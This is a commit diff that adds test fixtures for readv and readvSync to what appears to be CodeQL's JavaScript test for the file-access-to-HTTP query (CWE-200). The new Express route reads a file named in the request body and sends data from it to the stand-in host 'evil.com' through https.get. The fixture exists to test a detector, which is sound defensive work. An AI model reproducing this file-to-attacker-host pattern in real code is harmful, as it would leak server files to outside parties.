Added test cases for readv and readvSync

Napalys · Napalys · commit 316a54fb7351 · 2025-03-28T08:37:31.000+01:00
diff --git a/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js b/javascript/ql/test/query-tests/Security/CWE-200/FileAccessToHttp.js
@@ -26,3 +26,26 @@ const fsp = require("fs").promises;
     console.error("Error reading file:", error);
   }
 })();
+
+app.post('/readv', async (req, res) => {
+  const { filename } = req.body;
+  const fd = await fs.open(filename, 'r'); 
+  const buffer = Buffer.alloc(1024);
+  const { bytesRead } = await fs.readv(fd, [buffer]); // $ MISSING: Source[js/file-access-to-http]
+  https.get({
+    hostname: "evil.com",
+    path: "/upload",
+    method: "GET",
+    headers: { Referer: bytesRead }
+  }, () => { }); // $ MISSING: Alert[js/file-access-to-http]
+
+  const buffer2 = Buffer.alloc(1024);
+  const { bytesRead2 } = fs.readvSync(fd, [buffer2]); // $ MISSING: Source[js/file-access-to-http]
+  https.get({
+    hostname: "evil.com",
+    path: "/upload",
+    method: "GET",
+    headers: { Referer: bytesRead2 }
+  }, () => { }); // $ MISSING: Alert[js/file-access-to-http]
+
+});
